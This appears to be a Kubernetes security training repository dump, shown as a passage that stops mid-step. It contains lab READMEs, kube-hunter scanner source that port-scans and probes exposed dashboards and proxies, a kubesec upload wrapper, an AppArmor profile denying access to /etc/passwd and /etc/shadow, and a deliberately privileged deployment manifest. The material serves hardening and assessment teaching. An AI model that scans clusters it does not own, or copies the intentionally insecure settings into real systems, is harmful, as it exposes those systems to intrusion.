-------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Bench/img/kube-bench-4.png: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/Kube-Bench/img/kube-bench-4.png
-------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Bench/kube-bench: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/Kube-Bench/kube-bench
-------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Hunter/README.md: --------------------------------------------------------------------------------
# Scanning K8s Cluster - Kubehunter



##### Step 1:


* Navigate to the `Kube-Hunter` directory, which contains the `kube-hunter.py` script used in the steps below.

```bash
cd /home/we45/container_training/Kubernetes/VM/Kube-Hunter
```


##### Step 2:

* To get a list of the available arguments, run

```bash
./kube-hunter.py --help
```


##### Step 3:

* To list all passive and active hunters (without running them), run the following command

```bash
./kube-hunter.py --active --list
```

* Note: combined with `--list`, `--active` only extends the listing. Running an actual active hunt (`./kube-hunter.py --active`) performs intrusive probes that can change state on the target cluster, so only use it against the lab minikube instance, never against a cluster you do not own.


##### Step 4:

* Start a passive scan with kube-hunter

```bash
./kube-hunter.py
```


##### Step 5:

* Select `option 2` to run a scan on the minikube instance deployed on the VM

-------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Hunter/__init__.py: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/Kube-Hunter/__init__.py
-------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Hunter/img/kube-hunter-1.png: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/Kube-Hunter/img/kube-hunter-1.png
-------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Hunter/img/kube-hunter-2.png: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/Kube-Hunter/img/kube-hunter-2.png
-------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Hunter/img/kube-hunter-3.png: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/Kube-Hunter/img/kube-hunter-3.png -------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Hunter/img/kube-hunter-4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/Kube-Hunter/img/kube-hunter-4.png -------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Hunter/img/kube-hunter-5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/Kube-Hunter/img/kube-hunter-5.png -------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Hunter/plugins/README.md: -------------------------------------------------------------------------------- 1 | # Plugins 2 | 3 | This folder contains modules that will load before any parsing of arguments by kubehunter's main module 4 | 5 | An example for using a plugin to add an argument: 6 | ```python 7 | # example.py 8 | from __main__ import parser 9 | 10 | parser.add_argument('--exampleflag', action="store_true", help="enables active hunting") 11 | ``` 12 | What we did here was just add a file to the `plugins/` folder, import the parser, and adding an argument. 13 | 14 | All plugins in this folder gets imported right after the main arguments are added, and right before they are getting parsed, so you can add an argument that will later be used in your [hunting/discovery module](../src/README.md). 
15 | -------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Hunter/plugins/__init__.py: -------------------------------------------------------------------------------- 1 | from os.path import dirname, basename, isfile 2 | import glob 3 | 4 | # dynamically importing all modules in folder 5 | files = glob.glob(dirname(__file__)+"/*.py") 6 | for module_name in (basename(f)[:-3] for f in files if isfile(f) and not f.endswith('__init__.py')): 7 | exec('from {} import *'.format(module_name)) -------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Hunter/requirements.txt: -------------------------------------------------------------------------------- 1 | netaddr 2 | netifaces 3 | enum34 4 | scapy 5 | requests 6 | PrettyTable 7 | urllib3 8 | ruamel.yaml 9 | -------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Hunter/src/__init__.py: -------------------------------------------------------------------------------- 1 | import core 2 | import modules -------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Hunter/src/core/__init__.py: -------------------------------------------------------------------------------- 1 | import types 2 | import events -------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Hunter/src/core/events/__init__.py: -------------------------------------------------------------------------------- 1 | from handler import * 2 | import types -------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Hunter/src/core/events/types/__init__.py: -------------------------------------------------------------------------------- 1 | from os.path import dirname, basename, isfile 2 | import glob 3 | 4 | from common import * 5 | 6 | # dynamically importing all modules in folder 7 | files = 
glob.glob(dirname(__file__)+"/*.py") 8 | for module_name in (basename(f)[:-3] for f in files if isfile(f) and not f.endswith('__init__.py')): 9 | if module_name != "handler": 10 | exec('from {} import *'.format(module_name)) -------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Hunter/src/core/types.py: -------------------------------------------------------------------------------- 1 | class ActiveHunter(object): 2 | def publish_event(self, event): 3 | handler.publish_event(event, caller=self) 4 | 5 | 6 | class Hunter(object): 7 | def publish_event(self, event): 8 | handler.publish_event(event, caller=self) 9 | 10 | 11 | """Kubernetes Components""" 12 | class KubernetesCluster(): 13 | """Kubernetes Cluster""" 14 | name = "Kubernetes Cluster" 15 | 16 | class Kubelet(KubernetesCluster): 17 | """The kubelet is the primary "node agent" that runs on each node""" 18 | name = "Kubelet" 19 | 20 | 21 | """ Categories """ 22 | class InformationDisclosure(object): 23 | name = "Information Disclosure" 24 | 25 | class RemoteCodeExec(object): 26 | name = "Remote Code Execution" 27 | 28 | class IdentityTheft(object): 29 | name = "Identity Theft" 30 | 31 | class UnauthenticatedAccess(object): 32 | name = "Unauthenticated Access" 33 | 34 | class AccessRisk(object): 35 | name = "Access Risk" 36 | 37 | 38 | from events import handler # import is in the bottom to break import loops -------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Hunter/src/modules/__init__.py: -------------------------------------------------------------------------------- 1 | import report 2 | import discovery 3 | import hunting -------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Hunter/src/modules/discovery/__init__.py: -------------------------------------------------------------------------------- 1 | from os.path import dirname, basename, isfile 2 | import glob 3 | 
4 | # dynamically importing all modules in folder 5 | files = glob.glob(dirname(__file__)+"/*.py") 6 | for module_name in (basename(f)[:-3] for f in files if isfile(f) and not f.endswith('__init__.py')): 7 | exec('from {} import *'.format(module_name)) -------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Hunter/src/modules/discovery/apiserver.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | from ...core.types import Hunter 4 | from ...core.events import handler 5 | from ...core.events.types import OpenPortEvent, Service, Event 6 | 7 | class ReadOnlyKubeletEvent(Service, Event): 8 | """The read-only port on the kubelet serves health probing endpoints, and is relied upon by many kubernetes componenets""" 9 | def __init__(self): 10 | Service.__init__(self, name="Kubelet API (readonly)") 11 | 12 | 13 | class ApiServer(Service, Event): 14 | """The API server is in charge of all operations on the cluster.""" 15 | def __init__(self): 16 | Service.__init__(self, name="API Server") 17 | 18 | @handler.subscribe(OpenPortEvent, predicate=lambda x: x.port == 443 or x.port == 6443) 19 | class ApiServerDiscovery(Hunter): 20 | """Api Server Discovery 21 | Checks for the existence of a an Api Server 22 | """ 23 | def __init__(self, event): 24 | self.event = event 25 | 26 | def execute(self): 27 | main_request = requests.get("https://{}:{}".format(self.event.host, self.event.port), verify=False).text 28 | if "code" in main_request: 29 | self.event.role = "Master" 30 | self.publish_event(ApiServer()) 31 | -------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Hunter/src/modules/discovery/dashboard.py: -------------------------------------------------------------------------------- 1 | import json 2 | 3 | import requests 4 | 5 | from ...core.events import handler 6 | from ...core.events.types import Event, OpenPortEvent, Service 
7 | from ...core.types import Hunter 8 | 9 | 10 | class KubeDashboardEvent(Service, Event): 11 | """A web-based Kubernetes user interface. allows easy usage with operations on the cluster""" 12 | def __init__(self, **kargs): 13 | Service.__init__(self, name="Kubernetes Dashboard", **kargs) 14 | 15 | @handler.subscribe(OpenPortEvent, predicate=lambda x: x.port == 30000) 16 | class KubeDashboard(Hunter): 17 | """K8s Dashboard Discovery 18 | Checks for the existence of a Dashboard 19 | """ 20 | def __init__(self, event): 21 | self.event = event 22 | 23 | @property 24 | def secure(self): 25 | r = requests.get("http://{}:{}/api/v1/service/default".format(self.event.host, self.event.port)) 26 | if "listMeta" in r.text and len(json.loads(r.text)["errors"]) == 0: 27 | return False 28 | return True 29 | 30 | def execute(self): 31 | if not self.secure: 32 | self.publish_event(KubeDashboardEvent()) 33 | -------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Hunter/src/modules/discovery/ports.py: -------------------------------------------------------------------------------- 1 | import logging 2 | 3 | from socket import socket 4 | from ...core.types import Hunter 5 | 6 | from ...core.events import handler 7 | from ...core.events.types import NewHostEvent, OpenPortEvent 8 | 9 | 10 | default_ports = [8001, 10250, 10255, 30000, 443, 6443] 11 | 12 | @handler.subscribe(NewHostEvent) 13 | class PortDiscovery(Hunter): 14 | """Port Scanning 15 | Scans Kubernetes known ports to determine open endpoints for discovery 16 | """ 17 | def __init__(self, event): 18 | self.event = event 19 | self.host = event.host 20 | self.port = event.port 21 | 22 | def execute(self): 23 | logging.debug("host {0} try ports {1}".format(self.host, default_ports)) 24 | for single_port in default_ports: 25 | if self.test_connection(self.host, single_port): 26 | self.publish_event(OpenPortEvent(port=single_port)) 27 | 28 | @staticmethod 29 | def 
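test_connection(host, port):
        s = socket()
        s.settimeout(1.5)
        try:
            success = s.connect_ex((str(host), port))
            if success == 0:
                return True
        except: pass
        finally: s.close()
        return False

-------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Hunter/src/modules/discovery/proxy.py: --------------------------------------------------------------------------------
import requests
from ...core.types import Hunter

from ...core.events import handler
from ...core.events.types import Service, Event, OpenPortEvent

# Upper bound (seconds) on each probe of the proxy endpoint so that an
# unresponsive host cannot stall the whole scan. ports.py already bounds the
# raw TCP connect with a short timeout; without this the HTTP GET had none.
PROXY_REQUEST_TIMEOUT = 5


class KubeProxyEvent(Event, Service):
    """proxies from a localhost address to the Kubernetes apiserver"""
    def __init__(self):
        Service.__init__(self, name="Kubernetes Proxy")


@handler.subscribe(OpenPortEvent, predicate=lambda x: x.port == 8001)
class KubeProxy(Hunter):
    """Proxy Discovery
    Checks for the existence of an open Proxy service
    """
    def __init__(self, event):
        # event: the OpenPortEvent (port 8001) that triggered this hunter
        self.event = event
        self.host = event.host
        self.port = event.port or 8001

    @property
    def accesible(self):
        """True if an unauthenticated GET to /api/v1 on the discovered port
        returns an APIResourceList, i.e. a kubectl proxy is exposed without
        authentication. Returns False when the request fails or times out.
        """
        url = "http://{host}:{port}/api/v1".format(host=self.host, port=self.port)
        try:
            r = requests.get(url, timeout=PROXY_REQUEST_TIMEOUT)
        except requests.RequestException:
            # unreachable / reset / timed out: report "not accessible" instead of
            # aborting the hunter with an exception
            return False
        return r.status_code == 200 and "APIResourceList" in r.text

    def execute(self):
        if self.accesible:
            self.publish_event(KubeProxyEvent())

-------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Hunter/src/modules/hunting/__init__.py: --------------------------------------------------------------------------------
from os.path import dirname, basename, isfile
import glob

# dynamically importing all modules in folder
# NOTE(review): this imports (and therefore executes) every *.py file found in this
# directory at load time, so the directory is an implicit code-execution surface;
# keep it read-only for anything other than the tool's own installation.
files = glob.glob(dirname(__file__)+"/*.py")
for module_name in (basename(f)[:-3] for f in files if isfile(f) and not f.endswith('__init__.py')):
    exec('from {} import *'.format(module_name))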
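-------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Hunter/src/modules/hunting/certificates.py: --------------------------------------------------------------------------------
from ...core.types import Hunter, KubernetesCluster, InformationDisclosure
from ...core.events import handler
from ...core.events.types import Vulnerability, Event, Service

import base64
import re
import socket
import ssl

# Deliberately narrow (lower-case alphanumerics only): it is matched against the
# raw DER bytes of the certificate, where a looser pattern would pick up noise.
email_pattern = re.compile(r"([a-z0-9]+@[a-z0-9]+\.[a-z0-9]+)")


def _pem_to_der(pem):
    """Return the DER bytes encoded by a single PEM certificate.

    Drops the -----BEGIN/END----- armour lines and base64-decodes the rest.
    The previous ``cert.strip(ssl.PEM_HEADER).strip(ssl.PEM_FOOTER)`` stripped
    *characters* from the ends rather than the header/footer strings: it could
    remove leading or trailing base64 digits and left the footer in place, so
    the decode was only correct by accident.
    """
    body = "".join(line.strip() for line in pem.splitlines()
                   if line.strip() and not line.startswith("-----"))
    return base64.b64decode(body)


class CertificateEmail(Vulnerability, Event):
    """Certificate includes an email address"""
    def __init__(self, email):
        # email: the address found in the certificate; surfaced as report evidence
        Vulnerability.__init__(self, KubernetesCluster, "Certificate Includes Email Address", category=InformationDisclosure)
        self.email = email
        self.evidence = "email: {}".format(self.email)


@handler.subscribe(Service)
class CertificateDiscovery(Hunter):
    """Certificate Email Hunting
    Checks for email addresses in kubernetes ssl certificates
    """
    def __init__(self, event):
        # event: any discovered Service; host/port are read from it
        self.event = event

    def execute(self):
        try:
            addr = (str(self.event.host), self.event.port)
            # NOTE(review): no timeout can be passed here on Python 2, so an
            # unresponsive port stalls this hunter until the OS gives up.
            cert = ssl.get_server_certificate(addr)
        except (ssl.SSLError, socket.error):
            # If the server doesn't offer SSL on this port (or refuses / drops the
            # connection) we won't get a certificate
            return
        certdata = _pem_to_der(cert)
        if not isinstance(certdata, str):
            # Python 3: b64decode yields bytes; map them 1:1 onto str so the
            # str pattern above still applies
            certdata = certdata.decode("latin-1")
        for email in re.findall(email_pattern, certdata):
            self.publish_event(CertificateEmail(email=email))
-------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Hunter/src/modules/hunting/dashboard.py: --------------------------------------------------------------------------------
import json
from ...core.types import Hunter, RemoteCodeExec, KubernetesCluster

import requests

from ...core.events import handler
from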
...core.events.types import Vulnerability, Event 8 | from ..discovery.dashboard import KubeDashboardEvent 9 | 10 | class DashboardExposed(Vulnerability, Event): 11 | """All oprations on the cluster are exposed""" 12 | def __init__(self, nodes): 13 | Vulnerability.__init__(self, KubernetesCluster, "Dashboard Exposed", category=RemoteCodeExec) 14 | self.evidence = "nodes: {}".format(' '.join(nodes)) if nodes else None 15 | 16 | @handler.subscribe(KubeDashboardEvent) 17 | class KubeDashboard(Hunter): 18 | """Dashboard Hunting 19 | Hunts open Dashboards, gets the type of nodes in the cluster 20 | """ 21 | def __init__(self, event): 22 | self.event = event 23 | 24 | def get_nodes(self): 25 | r = requests.get("http://{}:{}/api/v1/node".format(self.event.host, self.event.port)) 26 | if r.status_code == 200 and "nodes" in r.text: 27 | return list(map(lambda node: node["objectMeta"]["name"], json.loads(r.text)["nodes"])) 28 | 29 | def execute(self): 30 | self.publish_event(DashboardExposed(nodes=self.get_nodes())) -------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Hunter/src/modules/report/__init__.py: -------------------------------------------------------------------------------- 1 | from os.path import dirname, basename, isfile 2 | import glob 3 | 4 | # dynamically importing all modules in folder 5 | files = glob.glob(dirname(__file__)+"/*.py") 6 | for module_name in (basename(f)[:-3] for f in files if isfile(f) and not f.endswith('__init__.py')): 7 | exec('from {} import *'.format(module_name)) -------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Hunter/src/modules/report/yaml.py: -------------------------------------------------------------------------------- 1 | import StringIO 2 | 3 | from ruamel.yaml import YAML 4 | 5 | from collector import services, vulnerabilities 6 | 7 | 8 | class YAMLReporter(object): 9 | def get_report(self): 10 | yaml = YAML() 11 | report = { 12 
| "nodes": self.get_nodes(), 13 | "services": self.get_services(), 14 | "vulnerabilities": self.get_vulenrabilities() 15 | } 16 | output = StringIO.StringIO() 17 | yaml.dump(report, output) 18 | return output.getvalue() 19 | 20 | def get_nodes(self): 21 | nodes = list() 22 | node_locations = set() 23 | for service in services: 24 | node_location = str(service.host) 25 | if node_location not in node_locations: 26 | nodes.append({"type": "Node/Master", "location": str(service.host)}) 27 | node_locations.add(node_location) 28 | return nodes 29 | 30 | def get_services(self): 31 | return [{"service": service.get_name(), 32 | "location": "{}:{}{}".format(service.host, service.port, service.get_path()), 33 | "description": service.explain()} 34 | for service in services] 35 | 36 | def get_vulenrabilities(self): 37 | return [{"location": "{}:{}".format(vuln.host, vuln.port) if vuln.host else "", 38 | "category": vuln.category.name, 39 | "vulnerability": vuln.get_name(), 40 | "description": vuln.explain(), 41 | "evidence": str(vuln.evidence)} 42 | for vuln in vulnerabilities] 43 | -------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Sec/README.md: -------------------------------------------------------------------------------- 1 | # YAML Static Analyser - Kubesec 2 | 3 | ###### Kubesec helps quantify risk for K8s resources based on the suggested best-practices. Lists of test run can be found at https://kubesec.io/basics/. 


##### Step 1:

* Navigate to the `Kube-Sec` directory

```bash
cd /home/we45/container_training/Kubernetes/VM/Kube-Sec
```


##### Step 2:

* To analyze a Kubernetes YAML spec file, run

```bash
./kubesec insecure_vulflask_deployment.yaml
```

* Note: the `kubesec` wrapper in this directory does not scan locally - it uploads the whole manifest to the hosted service at `https://kubesec.io/` and prints the JSON verdict. Do not submit manifests that contain Secrets, credentials or internal hostnames.


##### Step 3:

* To save results to a file, run the following command (`>>` appends, so repeated runs accumulate in the same file; use `>` to overwrite a previous report)

```bash
./kubesec insecure_vulflask_deployment.yaml >> kubesec_result.json
```
-------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Sec/img/kube-sec-1.png: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/Kube-Sec/img/kube-sec-1.png
-------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Sec/img/kube-sec-2.png: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/Kube-Sec/img/kube-sec-2.png
-------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Sec/insecure_vulflask_deployment.yaml: --------------------------------------------------------------------------------
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  name: vul-flask
spec:
  replicas: 2
  minReadySeconds: 15
  strategy:
    type: RollingUpdate
    rollingUpdate:
      maxUnavailable: 1
      maxSurge: 1
  template:
    metadata:
      labels:
        app: vul-flask
    spec:
      containers:
      - image: abhaybhargav/vul_flask
        imagePullPolicy: Always
        name: vul-flask
        ports:
        - containerPort: 5050
        securityContext:
          # the privileged flag will be marked as a critical risk
          privileged: true
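readOnlyRootFilesystem: true
-------------------------------------------------------------------------------- /Kubernetes/VM/Kube-Sec/kubesec: --------------------------------------------------------------------------------
#!/usr/bin/env bash
# Thin wrapper around the hosted kubesec scanner: POSTs the manifest given as $1
# to https://kubesec.io/ and prints the JSON verdict on stdout.
#
# NOTE(review): the whole manifest leaves this machine and is processed by a
# third-party service. Do not submit manifests that embed Secrets, credentials or
# internal hostnames; use a local kubesec build for those instead of this wrapper.
FILE="${1:-}";
[[ ! -f "${FILE}" ]] && {
    echo "kubesec: ${FILE}: No such file. Please Check file path" >&2;
    # Previously execution fell through here and curl was still run with the
    # missing path, producing a confusing curl error after the message above.
    exit 1;
};
curl --silent --compressed --connect-timeout 5 -F file=@"${FILE}" https://kubesec.io/
-------------------------------------------------------------------------------- /Kubernetes/VM/PodSecurityPolicy/k8s-vul-flask-redis-armor: --------------------------------------------------------------------------------
# NOTE(review): the targets of the two #include directives appear to have been lost
# in this rendering (normally <tunables/global> here and <abstractions/base> inside
# the profile); confirm against the file in the repository before loading it.
#include
# attach_disconnected: paths disconnected from the namespace root (typical for
# overlay/bind mounts in containers) are still matched; mediate_deleted: files that
# were unlinked while open keep being mediated.
profile k8s-vul-flask-redis-armor flags=(attach_disconnected,mediate_deleted) {
    #include
    # Broad allow rules; the explicit deny rules below take precedence over them.
    file,
    network,
    capability,
    deny /app/** w, #deny file write to /app directory
    deny /tmp/** w, #deny file write to /tmp directory
    deny /etc/passwd rwklx, #deny all access to /etc/passwd
    deny /etc/shadow rwklx, #deny all access to /etc/shadow

    #restrict access to HOME

    audit deny @{HOME}/.* mrwkl,
    audit deny @{HOME}/.*/ rw,
    audit deny @{HOME}/.*/** mrwkl,
    audit deny @{HOME}/bin/ rw,
    audit deny @{HOME}/bin/** mrwkl,
    # @{HOME}/ r,
    # @{HOME}/** rw,
}
-------------------------------------------------------------------------------- /Kubernetes/VM/PodSecurityPolicy/reverseproxy.conf: --------------------------------------------------------------------------------
server {
    listen 80;
    server_name localhost;

    location / {
        # The flask container shares this pod's network namespace, so its port
        # 5000 is reachable on loopback; proxy_bind pins the upstream source
        # address to loopback as well.
        proxy_bind 127.0.0.1;
        proxy_pass http://127.0.0.1:5000;
    }

    error_page 500 502 503 504 /50x.html;
    location = /50x.html {
        root /usr/share/nginx/html;
    }
}
-------------------------------------------------------------------------------- /Kubernetes/VM/PodSecurityPolicy/secure-ngflask-deploy.yml: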
-------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: secure-ngflask-redis 5 | annotations: 6 | seccomp.security.alpha.kubernetes.io/defaultProfileName: 'docker/default' 7 | container.apparmor.security.beta.kubernetes.io/secure-vul-flask: 'localhost/k8s-vul-flask-redis-armor' 8 | labels: 9 | app: secure-ngflask-redis 10 | spec: 11 | containers: 12 | - name: nginx 13 | image: nginx:1.11 14 | ports: 15 | - containerPort: 80 16 | volumeMounts: 17 | - mountPath: /etc/nginx/conf.d 18 | name: config-volume 19 | - name: redis 20 | image: redis 21 | ports: 22 | - containerPort: 6379 23 | - name: secure-vul-flask 24 | image: abhaybhargav/secure_vul_flask 25 | imagePullPolicy: Always 26 | securityContext: 27 | runAsUser: 100 28 | runAsNonRoot: true 29 | allowPrivilegeEscalation: false 30 | env: 31 | - name: REDIS_HOST 32 | value: 127.0.0.1 33 | ports: 34 | - containerPort: 5000 35 | name: vulflask-port 36 | volumes: 37 | - name: config-volume 38 | configMap: 39 | name: nginx-config 40 | items: 41 | - key: reverseproxy.conf 42 | path: reverseproxy.conf -------------------------------------------------------------------------------- /Kubernetes/VM/README.md: -------------------------------------------------------------------------------- 1 | # [Kubernetes](README.md) 2 | 3 | * ###### VM Instructions 4 | 5 | ###### Important: Run the Steps in `Initial-Setup` 6 | 7 | ------------------------------ 8 | 9 | ##### Kubernetes - Attacking A Cluster 10 | 11 | * [Cluster Attack](K8s-Cluster-Attack/README.md) 12 | 13 | 14 | ##### Kubernetes - Role Based Access Control 15 | 16 | * [Role Based Access Control](RoleBasedAccessControl/README.md) 17 | 18 | 19 | ##### Kubernetes - Pod Security Policy 20 | 21 | * [Pod Security Policy](PodSecurityPolicy/README.md) 22 | 23 | 24 | ##### Kubernetes - Resource Quota 25 | 26 | * [Resource Quota](ResourceQuota_Limit/README.md) 27 | 28 | 29 | ##### Kubernetes - Secrets 
30 | 31 | * [KubeSeal - Sealed Secrets](SealedSecrets/README.md) 32 | 33 | 34 | ##### Kubernetes - Vulnerability Assessment 35 | 36 | * [Kube-Sec](Kube-Sec/README.md) 37 | 38 | * [Kube-Bench](Kube-Bench/README.md) 39 | 40 | * [Kube-Hunter](Kube-Hunter/README.md) 41 | 42 | 43 | ##### Kubernetes - Monitoring and Logging 44 | 45 | * [Sysdig Falco](SysdigFalco/README.md) 46 | -------------------------------------------------------------------------------- /Kubernetes/VM/ResourceQuota_Limit/README.md: -------------------------------------------------------------------------------- 1 | # Resource Quotas and Limits 2 | 3 | ##### Step 1: 4 | 5 | * Navigate to the `ResourceQuota_Limit` directory 6 | 7 | ```bash 8 | cd /home/we45/container_training/Kubernetes/VM/ResourceQuota_Limit 9 | ``` 10 | 11 | ##### Step 2: 12 | 13 | * Create a pod on the `default` namespace. 14 | 15 | ```bash 16 | kubectl create -f nginx-basic-limit.yaml 17 | ``` 18 | 19 | * Ensure that the status of the pod is set to `Running` 20 | 21 | ```bash 22 | kubectl get pods 23 | ``` 24 | 25 | ##### Step 3: 26 | 27 | * Now test the memory consumption of the pod with the `stress` command: 28 | 29 | * Run `kubectl exec -it nginx-resource -- stress --cpu 1 --io 1 --vm 2 --vm-bytes 100M` 30 | 31 | * Stop it and run: `kubectl exec -it nginx-resource -- stress --cpu 1 --io 1 --vm 2 --vm-bytes 200M` 32 | 33 | * Stop it and run `kubectl exec -it nginx-resource -- stress --cpu 1 --io 1 --vm 2 --vm-bytes 400M` 34 | 35 | * It can be observed that the stress test fails with `exit code 1` at 400M because of the limit specified in Pod Spec. 
36 | 37 | -------------------------------------------------------------------------------- /Kubernetes/VM/ResourceQuota_Limit/nginx-basic-limit.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: nginx-resource 5 | namespace: default 6 | spec: 7 | containers: 8 | - image: sharathwe45/nginx-stress 9 | name: nginx 10 | resources: 11 | requests: 12 | memory: 400Mi 13 | limits: 14 | memory: 500Mi -------------------------------------------------------------------------------- /Kubernetes/VM/RoleBasedAccessControl/img/rbac-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/RoleBasedAccessControl/img/rbac-1.png -------------------------------------------------------------------------------- /Kubernetes/VM/RoleBasedAccessControl/img/rbac-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/RoleBasedAccessControl/img/rbac-2.png -------------------------------------------------------------------------------- /Kubernetes/VM/RoleBasedAccessControl/img/rbac-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/RoleBasedAccessControl/img/rbac-3.png -------------------------------------------------------------------------------- /Kubernetes/VM/RoleBasedAccessControl/img/rbac-4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/RoleBasedAccessControl/img/rbac-4.png 
-------------------------------------------------------------------------------- /Kubernetes/VM/RoleBasedAccessControl/img/rbac-5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/RoleBasedAccessControl/img/rbac-5.png -------------------------------------------------------------------------------- /Kubernetes/VM/RoleBasedAccessControl/img/rbac-6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/RoleBasedAccessControl/img/rbac-6.png -------------------------------------------------------------------------------- /Kubernetes/VM/RoleBasedAccessControl/img/rbac-7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/RoleBasedAccessControl/img/rbac-7.png -------------------------------------------------------------------------------- /Kubernetes/VM/RoleBasedAccessControl/img/rbac-8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/RoleBasedAccessControl/img/rbac-8.png -------------------------------------------------------------------------------- /Kubernetes/VM/RoleBasedAccessControl/img/rbac-9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/RoleBasedAccessControl/img/rbac-9.png -------------------------------------------------------------------------------- /Kubernetes/VM/RoleBasedAccessControl/role-deployment-manager.yaml: 
-------------------------------------------------------------------------------- 1 | kind: Role 2 | apiVersion: rbac.authorization.k8s.io/v1beta1 3 | metadata: 4 | namespace: restricted-namespace 5 | name: deployment-manager 6 | rules: 7 | - apiGroups: ["", "extensions", "apps"] 8 | resources: 9 | - deployments 10 | - replicasets 11 | - pods 12 | - services 13 | verbs: 14 | - get 15 | - list 16 | - watch 17 | - create 18 | - update 19 | - patch 20 | 21 | -------------------------------------------------------------------------------- /Kubernetes/VM/RoleBasedAccessControl/rolebinding-deployment-manager.yaml: -------------------------------------------------------------------------------- 1 | kind: RoleBinding 2 | apiVersion: rbac.authorization.k8s.io/v1beta1 3 | metadata: 4 | name: deployment-manager-binding 5 | namespace: restricted-namespace 6 | subjects: 7 | - kind: User 8 | name: restricteduser 9 | apiGroup: "" 10 | roleRef: 11 | kind: Role 12 | name: deployment-manager 13 | apiGroup: "" 14 | 15 | -------------------------------------------------------------------------------- /Kubernetes/VM/SealedSecrets/README.md: -------------------------------------------------------------------------------- 1 | # Kubernetes Sealed Secrets - Kubeseal 2 | 3 | 4 | ##### Step 1: 5 | 6 | * Navigate to the `SealedSecrets` directory 7 | 8 | ```bash 9 | cd /root/container_training/Kubernetes/VM/SealedSecrets 10 | ``` 11 | 12 | 13 | ##### Step 2: 14 | 15 | * Ensure that minikube is running 16 | 17 | ```bash 18 | minikube status 19 | ``` 20 | 21 | 22 | ##### Step 3: 23 | 24 | * Seal the existing secret with `kubeseal` 25 | 26 | ```bash 27 | kubeseal mysealedsecret.json 28 | ``` 29 | 30 | * Check the sealed-secret file 31 | 32 | ```bash 33 | cat mysealedsecret.json 34 | ``` 35 | 36 | 37 | ##### Step 5: 38 | 39 | * Create the Sealed-Secret 40 | 41 | ```bash 42 | 